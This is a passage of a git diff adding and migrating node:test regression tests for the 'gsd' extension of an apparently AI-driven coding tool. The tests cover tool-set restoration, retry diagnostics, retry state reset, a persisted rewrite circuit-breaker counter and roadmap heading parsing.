+++ b/src/resources/extensions/gsd/tests/restore-tools-after-discuss.test.ts
@@ -0,0 +1,63 @@
+/**
+ * Regression test for #3628 — restore tool set after discuss flow scoping
+ *
+ * The discuss flow narrows the active tool set to avoid "grammar too complex"
+ * errors. Without restoring after sendMessage, the narrowed tools leaked into
+ * subsequent dispatches, breaking plan/execute flows.
+ *
+ * The fix saves the full tool set before scoping and restores it after
+ * sendMessage returns.
+ */
+
+import { describe, it } from 'node:test'
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import { resolve } from 'node:path'
+
+const src = readFileSync(
+  resolve(process.cwd(), 'src', 'resources', 'extensions', 'gsd', 'guided-flow.ts'),
+  'utf-8',
+)
+
+describe('restore tools after discuss flow scoping (#3628)', () => {
+  it('savedTools is declared before the discuss scoping block', () => {
+    // savedTools must be declared before the discuss-* check
+    const savedToolsDecl = src.indexOf('let savedTools')
+    const discussCheck = src.indexOf('if (unitType?.startsWith("discuss-"))')
+    assert.ok(savedToolsDecl !== -1, 'savedTools variable must be declared')
+    assert.ok(discussCheck !== -1, 'discuss-* type check must exist')
+    assert.ok(
+      savedToolsDecl < discussCheck,
+      'savedTools must be declared before the discuss scoping block',
+    )
+  })
+
+  it('savedTools captures current tools inside the discuss block', () => {
+    const discussCheck = src.indexOf('if (unitType?.startsWith("discuss-"))')
+    assert.ok(discussCheck !== -1)
+
+    // Look for savedTools assignment within the discuss block
+    const blockAfter = src.slice(discussCheck, discussCheck + 500)
+    assert.ok(
+      blockAfter.includes('savedTools = currentTools'),
+      'savedTools must be assigned from currentTools inside the discuss block',
+    )
+  })
+
+  it('savedTools is restored after sendMessage', () => {
+    // Find the sendMessage call
+    const sendMsg = src.indexOf('triggerTurn: true')
+    assert.ok(sendMsg !== -1, 'sendMessage with triggerTurn must exist')
+
+    // After sendMessage, savedTools should be restored via setActiveTools
+    const afterSend = src.slice(sendMsg, sendMsg + 500)
+    assert.ok(
+      afterSend.includes('if (savedTools)'),
+      'savedTools restoration guard must exist after sendMessage',
+    )
+    assert.ok(
+      afterSend.includes('setActiveTools(savedTools)'),
+      'setActiveTools(savedTools) must be called to restore the full tool set',
+    )
+  })
+})
diff --git a/src/resources/extensions/gsd/tests/retry-diagnostic-reasoning.test.ts b/src/resources/extensions/gsd/tests/retry-diagnostic-reasoning.test.ts
new file mode 100644
index 000000000..b64283877
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/retry-diagnostic-reasoning.test.ts
@@ -0,0 +1,161 @@
+/**
+ * Regression tests for #2195: formatTraceSummary (used by getDeepDiagnostic →
+ * retry prompts) must NOT include lastReasoning from prior assistant text.
+ *
+ * Including prior assistant free-text in retry diagnostics causes hallucination
+ * loops when the previous turn was truncated or malformed.
+ *
+ * The crash recovery path (formatCrashRecoveryBriefing) has its own safe handling
+ * of lastReasoning and is NOT affected by this change.
+ */
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, writeFileSync, rmSync, mkdtempSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { extractTrace, getDeepDiagnostic } from "../session-forensics.ts";
+
+/** Build a minimal assistant text reasoning entry. */
+function makeAssistantText(text: string): unknown {
+  return {
+    type: "message",
+    message: {
+      role: "assistant",
+      content: [{ type: "text", text }],
+    },
+  };
+}
+
+/** Build a minimal assistant tool call + tool result pair. */
+function makeToolPair(
+  toolName: string,
+  input: Record<string, unknown>,
+  resultText: string,
+  isError: boolean,
+): unknown[] {
+  const toolCallId = `toolu_${Math.random().toString(36).slice(2, 10)}`;
+  return [
+    {
+      type: "message",
+      message: {
+        role: "assistant",
+        content: [
+          {
+            type: "toolCall",
+            id: toolCallId,
+            name: toolName,
+            arguments: input,
+          },
+        ],
+      },
+    },
+    {
+      type: "message",
+      message: {
+        role: "toolResult",
+        toolCallId,
+        toolName,
+        isError,
+        content: [{ type: "text", text: resultText }],
+      },
+    },
+  ];
+}
+
+describe("retry diagnostic excludes lastReasoning (#2195)", () => {
+  test("extractTrace still captures lastReasoning in the trace object", () => {
+    const entries = [
+      makeAssistantText("I am going to write the summary file now"),
+      ...makeToolPair("write", { path: "/tmp/SUMMARY.md" }, "ok", false),
+      makeAssistantText("The task is complete — all files written."),
+    ];
+
+    const trace = extractTrace(entries);
+    // extractTrace should still collect lastReasoning for crash recovery
+    assert.ok(trace.lastReasoning.length > 0,
+      "extractTrace should still populate lastReasoning");
+    assert.ok(trace.lastReasoning.includes("all files written"),
+      "lastReasoning should contain the last assistant text");
+  });
+
+  test("getDeepDiagnostic output does NOT contain lastReasoning", () => {
+    // Create a temporary activity directory with a JSONL file
+    const tempBase = mkdtempSync(join(tmpdir(), "gsd-diag-test-"));
+    const gsdDir = join(tempBase, ".gsd");
+    const activityDir = join(gsdDir, "activity");
+    mkdirSync(activityDir, { recursive: true });
+
+    try {
+      // Build entries with both tool calls and assistant reasoning
+      const entries = [
+        makeAssistantText("Let me analyze the codebase structure first"),
+        ...makeToolPair("bash", { command: "ls src/" }, "index.ts\nutils.ts", false),
+        makeAssistantText("I see the milestone/M001 branch has a significantly different ... 3. "),
+      ];
+
+      // Write JSONL activity file
+      const jsonl = entries.map(e => JSON.stringify(e)).join("\n");
+      writeFileSync(join(activityDir, "2025-01-01T00-00-00.jsonl"), jsonl);
+
+      const diagnostic = getDeepDiagnostic(tempBase);
+
+      // Diagnostic should exist (we have tool calls)
+      assert.ok(diagnostic !== null, "diagnostic should not be null");
+
+      // Diagnostic should contain structured execution evidence
+      assert.ok(diagnostic!.includes("Tool calls completed:"),
+        "should include tool call count");
+      assert.ok(diagnostic!.includes("ls src/"),
+        "should include commands run");
+
+      // Diagnostic must NOT contain the assistant's free-text reasoning
+      assert.ok(!diagnostic!.includes("Last reasoning"),
+        "diagnostic must not include 'Last reasoning' label");
+      assert.ok(!diagnostic!.includes("analyze the codebase"),
+        "diagnostic must not include prior assistant text");
+      assert.ok(!diagnostic!.includes("significantly different"),
+        "diagnostic must not include truncated assistant reasoning");
+    } finally {
+      rmSync(tempBase, { recursive: true, force: true });
+    }
+  });
+
+  test("getDeepDiagnostic still includes errors and file operations", () => {
+    const tempBase = mkdtempSync(join(tmpdir(), "gsd-diag-test-"));
+    const gsdDir = join(tempBase, ".gsd");
+    const activityDir = join(gsdDir, "activity");
+    mkdirSync(activityDir, { recursive: true });
+
+    try {
+      const entries = [
+        makeAssistantText("Writing the plan file"),
+        ...makeToolPair("write", { path: "M001/S01/S01-PLAN.md" }, "ok", false),
+        ...makeToolPair("bash", { command: "npm run build" }, "Error: type mismatch", true),
+        makeAssistantText("The build failed, let me investigate"),
+      ];
+
+      const jsonl = entries.map(e => JSON.stringify(e)).join("\n");
+      writeFileSync(join(activityDir, "2025-01-01T00-00-00.jsonl"), jsonl);
+
+      const diagnostic = getDeepDiagnostic(tempBase);
+      assert.ok(diagnostic !== null);
+
+      // Structured evidence should be present
+      assert.ok(diagnostic!.includes("S01-PLAN.md"),
+        "should include files written");
+      assert.ok(diagnostic!.includes("npm run build"),
+        "should include commands run");
+      assert.ok(diagnostic!.includes("type mismatch"),
+        "should include errors");
+
+      // But NOT the assistant's free-text
+      assert.ok(!diagnostic!.includes("Writing the plan"),
+        "must not include assistant reasoning");
+      assert.ok(!diagnostic!.includes("build failed"),
+        "must not include assistant reasoning about failures");
+    } finally {
+      rmSync(tempBase, { recursive: true, force: true });
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/retry-state-reset.test.ts b/src/resources/extensions/gsd/tests/retry-state-reset.test.ts
index f3c39b117..e16de8dd6 100644
--- a/src/resources/extensions/gsd/tests/retry-state-reset.test.ts
+++ b/src/resources/extensions/gsd/tests/retry-state-reset.test.ts
@@ -4,10 +4,11 @@
 // consuming code properly resets all completion state so deriveState
 // re-derives the task on the next loop iteration.
 
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, rmSync, writeFileSync, existsSync, readFileSync, unlinkSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
-import { createTestContext } from "./test-helpers.ts";
 import {
   resetHookState,
   consumeRetryTrigger,
@@ -15,8 +16,7 @@ import {
   resolveHookArtifactPath,
 } from "../post-unit-hooks.ts";
 import { uncheckTaskInPlan } from "../undo.ts";
-
-const { assertEq, assertTrue, report } = createTestContext();
+import { parseUnitId } from "../unit-id.ts";
 
 // ─── Fixture Helpers ───────────────────────────────────────────────────────
 
@@ -65,74 +65,65 @@ function createRetryFixture(): { base: string; cleanup: () => void } {
 // Test: consumeRetryTrigger returns retryArtifact field
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log("\n=== consumeRetryTrigger: returns null when no retry pending ===");
 
-{
+describe('retry-state-reset', () => {
+test('consumeRetryTrigger: returns null when no retry pending', () => {
   resetHookState();
   const trigger = consumeRetryTrigger();
-  assertEq(trigger, null, "returns null when no retry pending");
-}
+  assert.deepStrictEqual(trigger, null, "returns null when no retry pending");
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Test: uncheckTaskInPlan reverses doctor's [x] mark
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log("\n=== Retry reset step 1: uncheck [x] → [ ] in PLAN.md ===");
-
-{
+test('Retry reset step 1: uncheck [x] → [ ] in PLAN.md', () => {
   const { base, cleanup } = createRetryFixture();
   try {
     const planFile = join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-PLAN.md");
 
     // Precondition: T01 is checked
     const before = readFileSync(planFile, "utf-8");
-    assertTrue(before.includes("- [x] **T01:"), "precondition: T01 is checked [x]");
+    assert.ok(before.includes("- [x] **T01:"), "precondition: T01 is checked [x]");
 
     // Step 1: Uncheck T01
     const result = uncheckTaskInPlan(base, "M001", "S01", "T01");
-    assertTrue(result, "uncheckTaskInPlan returns true");
+    assert.ok(result, "uncheckTaskInPlan returns true");
 
     // Verify T01 is now unchecked
     const after = readFileSync(planFile, "utf-8");
-    assertTrue(after.includes("- [ ] **T01:"), "T01 is now unchecked [ ]");
-    assertTrue(!after.includes("- [x] **T01:"), "T01 no longer has [x]");
+    assert.ok(after.includes("- [ ] **T01:"), "T01 is now unchecked [ ]");
+    assert.ok(!after.includes("- [x] **T01:"), "T01 no longer has [x]");
 
     // T02 is unaffected
-    assertTrue(after.includes("- [ ] **T02:"), "T02 remains unchanged");
+    assert.ok(after.includes("- [ ] **T02:"), "T02 remains unchanged");
   } finally {
     cleanup();
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Test: Delete SUMMARY.md for the task
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log("\n=== Retry reset step 2: delete SUMMARY.md ===");
-
-{
+test('Retry reset step 2: delete SUMMARY.md', () => {
   const { base, cleanup } = createRetryFixture();
   try {
     const summaryFile = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks", "T01-SUMMARY.md");
 
     // Precondition: SUMMARY exists
-    assertTrue(existsSync(summaryFile), "precondition: SUMMARY.md exists");
+    assert.ok(existsSync(summaryFile), "precondition: SUMMARY.md exists");
 
     // Step 2: Delete SUMMARY.md
     unlinkSync(summaryFile);
-    assertTrue(!existsSync(summaryFile), "SUMMARY.md deleted");
+    assert.ok(!existsSync(summaryFile), "SUMMARY.md deleted");
   } finally {
     cleanup();
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Test: Remove from completedUnits array and flush
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log("\n=== Retry reset step 3: remove from completedUnits ===");
-
-{
+test('Retry reset step 3: remove from completedUnits', () => {
   const { base, cleanup } = createRetryFixture();
   try {
     // Simulate the completedUnits array (as AutoSession would have it)
@@ -146,8 +137,8 @@ console.log("\n=== Retry reset step 3: remove from completedUnits ===");
       u => !(u.type === "execute-task" && u.id === "M001/S01/T01"),
     );
 
-    assertEq(filtered.length, 1, "one unit removed from completedUnits");
-    assertEq(filtered[0].id, "M001/S01/T02", "T02 still in completedUnits");
+    assert.deepStrictEqual(filtered.length, 1, "one unit removed from completedUnits");
+    assert.deepStrictEqual(filtered[0].id, "M001/S01/T02", "T02 still in completedUnits");
 
     // Flush to completed-units.json
     const completedKeysPath = join(base, ".gsd", "completed-units.json");
@@ -155,42 +146,36 @@ console.log("\n=== Retry reset step 3: remove from completedUnits ===");
     writeFileSync(completedKeysPath, JSON.stringify(keys, null, 2), "utf-8");
 
     const onDisk = JSON.parse(readFileSync(completedKeysPath, "utf-8"));
-    assertEq(onDisk.length, 1, "completed-units.json has one entry");
-    assertEq(onDisk[0], "execute-task/M001/S01/T02", "only T02 remains in completed-units.json");
+    assert.deepStrictEqual(onDisk.length, 1, "completed-units.json has one entry");
+    assert.deepStrictEqual(onDisk[0], "execute-task/M001/S01/T02", "only T02 remains in completed-units.json");
   } finally {
     cleanup();
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Test: Delete the retry_on artifact
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log("\n=== Retry reset step 4: delete retry_on artifact ===");
-
-{
+test('Retry reset step 4: delete retry_on artifact', () => {
   const { base, cleanup } = createRetryFixture();
   try {
     const retryArtifactPath = resolveHookArtifactPath(base, "M001/S01/T01", "NEEDS-REWORK.md");
 
     // Precondition: artifact exists
-    assertTrue(existsSync(retryArtifactPath), "precondition: retry artifact exists");
+    assert.ok(existsSync(retryArtifactPath), "precondition: retry artifact exists");
 
     // Step 4: Delete retry artifact
     unlinkSync(retryArtifactPath);
-    assertTrue(!existsSync(retryArtifactPath), "retry artifact deleted");
+    assert.ok(!existsSync(retryArtifactPath), "retry artifact deleted");
   } finally {
     cleanup();
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Test: Full retry reset sequence (all steps together)
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log("\n=== Full retry reset: all steps combined ===");
-
-{
+test('Full retry reset: all steps combined', () => {
   const { base, cleanup } = createRetryFixture();
   try {
     const trigger = {
@@ -199,8 +184,7 @@ console.log("\n=== Full retry reset: all steps combined ===");
       retryArtifact: "NEEDS-REWORK.md",
     };
 
-    const parts = trigger.unitId.split("/");
-    const [mid, sid, tid] = parts;
+    const { milestone: mid, slice: sid, task: tid } = parseUnitId(trigger.unitId);
 
     // Simulate completedUnits
     let completedUnits = [
@@ -242,30 +226,27 @@ console.log("\n=== Full retry reset: all steps combined ===");
     // PLAN.md: T01 unchecked
     const planFile = join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-PLAN.md");
     const planContent = readFileSync(planFile, "utf-8");
-    assertTrue(planContent.includes("- [ ] **T01:"), "after reset: T01 unchecked in PLAN");
-    assertTrue(!planContent.includes("- [x] **T01:"), "after reset: T01 not checked in PLAN");
+    assert.ok(planContent.includes("- [ ] **T01:"), "after reset: T01 unchecked in PLAN");
+    assert.ok(!planContent.includes("- [x] **T01:"), "after reset: T01 not checked in PLAN");
 
     // SUMMARY.md: deleted
-    assertTrue(!existsSync(summaryFile), "after reset: SUMMARY.md deleted");
+    assert.ok(!existsSync(summaryFile), "after reset: SUMMARY.md deleted");
 
     // completed-units.json: empty
     const onDisk = JSON.parse(readFileSync(completedKeysPath, "utf-8"));
-    assertEq(onDisk.length, 0, "after reset: completed-units.json is empty");
+    assert.deepStrictEqual(onDisk.length, 0, "after reset: completed-units.json is empty");
 
     // Retry artifact: deleted
-    assertTrue(!existsSync(retryArtifactPath), "after reset: retry artifact deleted");
+    assert.ok(!existsSync(retryArtifactPath), "after reset: retry artifact deleted");
   } finally {
     cleanup();
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Test: Reset is idempotent — no crash when artifacts are already missing
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log("\n=== Retry reset: idempotent when artifacts already missing ===");
-
-{
+test('Retry reset: idempotent when artifacts already missing', () => {
   const base = mkdtempSync(join(tmpdir(), "gsd-retry-idempotent-"));
   try {
     // Create minimal structure — NO summary, NO retry artifact, NO plan
@@ -283,46 +264,42 @@ console.log("\n=== Retry reset: idempotent when artifacts already missing ===");
     };
 
     // These should not throw even with missing files
-    const parts = trigger.unitId.split("/");
-    const [mid, sid, tid] = parts;
+    const { milestone: mid, slice: sid, task: tid } = parseUnitId(trigger.unitId);
 
     // Uncheck — returns false because no PLAN file
-    const uncheckResult = uncheckTaskInPlan(base, mid, sid, tid);
-    assertTrue(!uncheckResult, "uncheck returns false when no PLAN exists");
+    const uncheckResult = uncheckTaskInPlan(base, mid, sid!, tid!);
+    assert.ok(!uncheckResult, "uncheck returns false when no PLAN exists");
 
     // Summary does not exist — no crash
     const summaryFile = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks", `${tid}-SUMMARY.md`);
-    assertTrue(!existsSync(summaryFile), "no summary to delete — safe");
+    assert.ok(!existsSync(summaryFile), "no summary to delete — safe");
 
     // Retry artifact does not exist — no crash
     const retryPath = resolveHookArtifactPath(base, trigger.unitId, trigger.retryArtifact);
-    assertTrue(!existsSync(retryPath), "no retry artifact to delete — safe");
+    assert.ok(!existsSync(retryPath), "no retry artifact to delete — safe");
 
     // completed-units.json filter on empty array — safe
     const completedUnits: Array<{ type: string; id: string }> = [];
     const filtered = completedUnits.filter(
       u => !(u.type === trigger.unitType && u.id === trigger.unitId),
     );
-    assertEq(filtered.length, 0, "filter on empty array is safe");
+    assert.deepStrictEqual(filtered.length, 0, "filter on empty array is safe");
   } finally {
     rmSync(base, { recursive: true, force: true });
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Test: resolveHookArtifactPath produces correct path for retry artifacts
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log("\n=== resolveHookArtifactPath: correct path for retry artifacts ===");
-
-{
+test('resolveHookArtifactPath: correct path for retry artifacts', () => {
   const base = "/project";
   const path = resolveHookArtifactPath(base, "M001/S01/T01", "NEEDS-REWORK.md");
-  assertEq(
+  assert.deepStrictEqual(
     path,
     join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks", "T01-NEEDS-REWORK.md"),
     "retry artifact path resolves to task directory with task prefix",
   );
-}
+});
 
-report();
+});
diff --git a/src/resources/extensions/gsd/tests/rewrite-count-persist.test.ts b/src/resources/extensions/gsd/tests/rewrite-count-persist.test.ts
new file mode 100644
index 000000000..d7c313431
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/rewrite-count-persist.test.ts
@@ -0,0 +1,82 @@
+/**
+ * Regression tests for #2203: rewrite-docs circuit breaker must persist
+ * across session restarts.
+ *
+ * The rewrite attempt counter was stored in-memory on the session object,
+ * resetting to 0 on every session restart. This allowed the rewrite-docs
+ * dispatch rule to fire indefinitely, never tripping the MAX_REWRITE_ATTEMPTS
+ * circuit breaker.
+ *
+ * The fix persists the counter to `.gsd/runtime/rewrite-count.json`.
+ */
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, existsSync, readFileSync, writeFileSync, rmSync, mkdtempSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { getRewriteCount, setRewriteCount } from "../auto-dispatch.ts";
+
+describe("rewrite-docs circuit breaker persistence (#2203)", () => {
+  let tempBase: string;
+
+  beforeEach(() => {
+    tempBase = mkdtempSync(join(tmpdir(), "gsd-rewrite-test-"));
+    // Create .gsd/ directory so gsdRoot resolves to it
+    mkdirSync(join(tempBase, ".gsd", "runtime"), { recursive: true });
+  });
+
+  afterEach(() => {
+    rmSync(tempBase, { recursive: true, force: true });
+  });
+
+  test("getRewriteCount returns 0 when no file exists", () => {
+    const count = getRewriteCount(tempBase);
+    assert.equal(count, 0);
+  });
+
+  test("setRewriteCount writes and getRewriteCount reads back", () => {
+    setRewriteCount(tempBase, 2);
+    const count = getRewriteCount(tempBase);
+    assert.equal(count, 2);
+  });
+
+  test("counter persists across simulated session restarts", () => {
+    // Session 1: increment to 1
+    setRewriteCount(tempBase, 1);
+
+    // "Session restart" — only the disk file survives, session object is gone
+    const countAfterRestart = getRewriteCount(tempBase);
+    assert.equal(countAfterRestart, 1, "counter should survive session restart");
+
+    // Session 2: increment to 2
+    setRewriteCount(tempBase, countAfterRestart + 1);
+    assert.equal(getRewriteCount(tempBase), 2);
+  });
+
+  test("setRewriteCount(0) resets the counter", () => {
+    setRewriteCount(tempBase, 3);
+    assert.equal(getRewriteCount(tempBase), 3);
+
+    setRewriteCount(tempBase, 0);
+    assert.equal(getRewriteCount(tempBase), 0);
+  });
+
+  test("getRewriteCount handles corrupt JSON gracefully", () => {
+    const filePath = join(tempBase, ".gsd", "runtime", "rewrite-count.json");
+    // writeFileSync is imported at the top of this file
+    writeFileSync(filePath, "not json{{{");
+    const count = getRewriteCount(tempBase);
+    assert.equal(count, 0, "corrupt file should return 0");
+  });
+
+  test("rewrite-count.json is written to .gsd/runtime/", () => {
+    setRewriteCount(tempBase, 1);
+    const filePath = join(tempBase, ".gsd", "runtime", "rewrite-count.json");
+    assert.ok(existsSync(filePath), "rewrite-count.json should exist");
+
+    const content = JSON.parse(readFileSync(filePath, "utf-8"));
+    assert.equal(content.count, 1);
+    assert.ok(content.updatedAt, "should include timestamp");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/roadmap-parse-regression.test.ts b/src/resources/extensions/gsd/tests/roadmap-parse-regression.test.ts
index f6530049a..602e9745f 100644
--- a/src/resources/extensions/gsd/tests/roadmap-parse-regression.test.ts
+++ b/src/resources/extensions/gsd/tests/roadmap-parse-regression.test.ts
@@ -12,20 +12,16 @@
  * Also covers dependency expansion (range syntax) and edge cases.
  */
 
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { parseRoadmapSlices, expandDependencies } from '../roadmap-slices.ts';
-import { createTestContext } from './test-helpers.ts';
-
-const { assertEq, assertTrue, report } = createTestContext();
-
-async function main(): Promise<void> {
-
   // ═══════════════════════════════════════════════════════════════════════
   // A. Standard machine-readable format (should always work)
   // ═══════════════════════════════════════════════════════════════════════
 
-  console.log('\n=== A. Standard checkbox format ===');
 
-  {
+describe('roadmap-parse-regression', () => {
+test('A. Standard checkbox format', () => {
     const content = [
       '# M001: Test Project',
       '',
@@ -40,30 +36,27 @@ async function main(): Promise<void> {
     ].join('\n');
 
     const slices = parseRoadmapSlices(content);
-    assertEq(slices.length, 3, 'standard format: 3 slices');
-    assertEq(slices[0].id, 'S01', 'S01 id');
-    assertEq(slices[0].title, 'First Slice', 'S01 title');
-    assertEq(slices[0].done, false, 'S01 not done');
-    assertEq(slices[0].risk, 'low', 'S01 risk');
-    assertEq(slices[0].depends.length, 0, 'S01 no deps');
+    assert.deepStrictEqual(slices.length, 3, 'standard format: 3 slices');
+    assert.deepStrictEqual(slices[0].id, 'S01', 'S01 id');
+    assert.deepStrictEqual(slices[0].title, 'First Slice', 'S01 title');
+    assert.deepStrictEqual(slices[0].done, false, 'S01 not done');
+    assert.deepStrictEqual(slices[0].risk, 'low', 'S01 risk');
+    assert.deepStrictEqual(slices[0].depends.length, 0, 'S01 no deps');
 
-    assertEq(slices[1].id, 'S02', 'S02 id');
-    assertEq(slices[1].depends.length, 1, 'S02 has 1 dep');
-    assertEq(slices[1].depends[0], 'S01', 'S02 depends on S01');
+    assert.deepStrictEqual(slices[1].id, 'S02', 'S02 id');
+    assert.deepStrictEqual(slices[1].depends.length, 1, 'S02 has 1 dep');
+    assert.deepStrictEqual(slices[1].depends[0], 'S01', 'S02 depends on S01');
 
-    assertEq(slices[2].id, 'S03', 'S03 id');
-    assertEq(slices[2].done, true, 'S03 is done');
-    assertEq(slices[2].risk, 'high', 'S03 risk');
-    assertEq(slices[2].depends.length, 2, 'S03 has 2 deps');
-  }
+    assert.deepStrictEqual(slices[2].id, 'S03', 'S03 id');
+    assert.deepStrictEqual(slices[2].done, true, 'S03 is done');
+    assert.deepStrictEqual(slices[2].risk, 'high', 'S03 risk');
+    assert.deepStrictEqual(slices[2].depends.length, 2, 'S03 has 2 deps');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // B. Prose fallback: H2 with colon (the only format the old regex matched)
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== B. Prose fallback: H2 with colon ===');
-
-  {
+test('B. Prose fallback: H2 with colon', () => {
     const content = [
       '# M001: Test',
       '',
@@ -78,20 +71,17 @@ async function main(): Promise<void> {
     ].join('\n');
 
     const slices = parseRoadmapSlices(content);
-    assertEq(slices.length, 2, 'prose H2 colon: 2 slices');
-    assertEq(slices[0].id, 'S01', 'S01 id');
-    assertEq(slices[0].title, 'Setup Foundation', 'S01 title');
-    assertEq(slices[1].id, 'S02', 'S02 id');
-    assertEq(slices[1].title, 'Core Features', 'S02 title');
-  }
+    assert.deepStrictEqual(slices.length, 2, 'prose H2 colon: 2 slices');
+    assert.deepStrictEqual(slices[0].id, 'S01', 'S01 id');
+    assert.deepStrictEqual(slices[0].title, 'Setup Foundation', 'S01 title');
+    assert.deepStrictEqual(slices[1].id, 'S02', 'S02 id');
+    assert.deepStrictEqual(slices[1].title, 'Core Features', 'S02 title');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // C. Regression #1248: H3 headers (the old regex only matched ##)
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== C. #1248: H3 headers ===');
-
-  {
+test('C. #1248: H3 headers', () => {
     const content = [
       '# M001: Test',
       '',
@@ -106,18 +96,15 @@ async function main(): Promise<void> {
     ].join('\n');
 
     const slices = parseRoadmapSlices(content);
-    assertEq(slices.length, 2, '#1248 H3: 2 slices parsed');
-    assertEq(slices[0].id, 'S01', 'S01 from H3');
-    assertEq(slices[1].id, 'S02', 'S02 from H3');
-  }
+    assert.deepStrictEqual(slices.length, 2, '#1248 H3: 2 slices parsed');
+    assert.deepStrictEqual(slices[0].id, 'S01', 'S01 from H3');
+    assert.deepStrictEqual(slices[1].id, 'S02', 'S02 from H3');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // D. Regression #1248: H4 headers
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== D. #1248: H4 headers ===');
-
-  {
+test('D. #1248: H4 headers', () => {
     const content = [
       '# M001: Test',
       '',
@@ -128,16 +115,13 @@ async function main(): Promise<void> {
     ].join('\n');
 
     const slices = parseRoadmapSlices(content);
-    assertEq(slices.length, 2, '#1248 H4: 2 slices parsed');
-  }
+    assert.deepStrictEqual(slices.length, 2, '#1248 H4: 2 slices parsed');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // E. Regression #1248: H1 header (unusual but LLMs produce it)
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== E. #1248: H1 headers ===');
-
-  {
+test('E. #1248: H1 headers', () => {
     const content = [
       '# S01: Setup Foundation',
       '',
@@ -150,97 +134,76 @@ async function main(): Promise<void> {
     ].join('\n');
 
     const slices = parseRoadmapSlices(content);
-    assertEq(slices.length, 2, '#1248 H1: 2 slices parsed');
-  }
+    assert.deepStrictEqual(slices.length, 2, '#1248 H1: 2 slices parsed');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // F. Regression #1248: Bold-wrapped IDs
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== F. #1248: Bold-wrapped ===');
-
-  {
+test('F. #1248: Bold-wrapped', () => {
     const content1 = '## **S01: Setup Foundation**\n\nDo stuff.\n\n## **S02: Features**\n\nMore stuff.\n';
     const slices1 = parseRoadmapSlices(content1);
-    assertEq(slices1.length, 2, 'bold-wrapped: 2 slices');
-    assertEq(slices1[0].title, 'Setup Foundation', 'bold-wrapped: title extracted without bold');
+    assert.deepStrictEqual(slices1.length, 2, 'bold-wrapped: 2 slices');
+    assert.deepStrictEqual(slices1[0].title, 'Setup Foundation', 'bold-wrapped: title extracted without bold');
 
     const content2 = '## **S01**: Setup Foundation\n\n## **S02**: Features\n';
     const slices2 = parseRoadmapSlices(content2);
-    assertEq(slices2.length, 2, 'bold ID only: 2 slices');
-  }
+    assert.deepStrictEqual(slices2.length, 2, 'bold ID only: 2 slices');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // G. Regression #1248: Dot separator
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== G. #1248: Dot separator ===');
-
-  {
+test('G. #1248: Dot separator', () => {
     const content = '## S01. Setup Foundation\n\n## S02. Core Features\n';
     const slices = parseRoadmapSlices(content);
-    assertEq(slices.length, 2, 'dot separator: 2 slices');
-    assertEq(slices[0].title, 'Setup Foundation', 'dot separator: title');
-  }
+    assert.deepStrictEqual(slices.length, 2, 'dot separator: 2 slices');
+    assert.deepStrictEqual(slices[0].title, 'Setup Foundation', 'dot separator: title');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // H. Regression #1248: Em dash separator
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== H. #1248: Em/en dash separators ===');
-
-  {
+test('H. #1248: Em/en dash separators', () => {
     const content = '## S01 — Setup Foundation\n\n## S02 – Core Features\n';
     const slices = parseRoadmapSlices(content);
-    assertEq(slices.length, 2, 'em/en dash: 2 slices');
-  }
+    assert.deepStrictEqual(slices.length, 2, 'em/en dash: 2 slices');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // I. Regression #1248: Space-only separator (no punctuation)
   // ═══════════════════════════════════════════════════════════════════════
-
-  console.log('\n=== I. #1248: Space-only separator ===');
-
-  {
+test('I. #1248: Space-only separator', () => {
     const content = '## S01 Setup Foundation\n\n## S02 Core Features\n';
     const slices = parseRoadmapSlices(content);
-    assertEq(slices.length, 2, 'space-only: 2 slices');
-    assertEq(slices[0].title, 'Setup Foundation', 'space-only: title');
-  }
+    assert.deepStrictEqual(slices.length, 2, 'space-only: 2 slices');
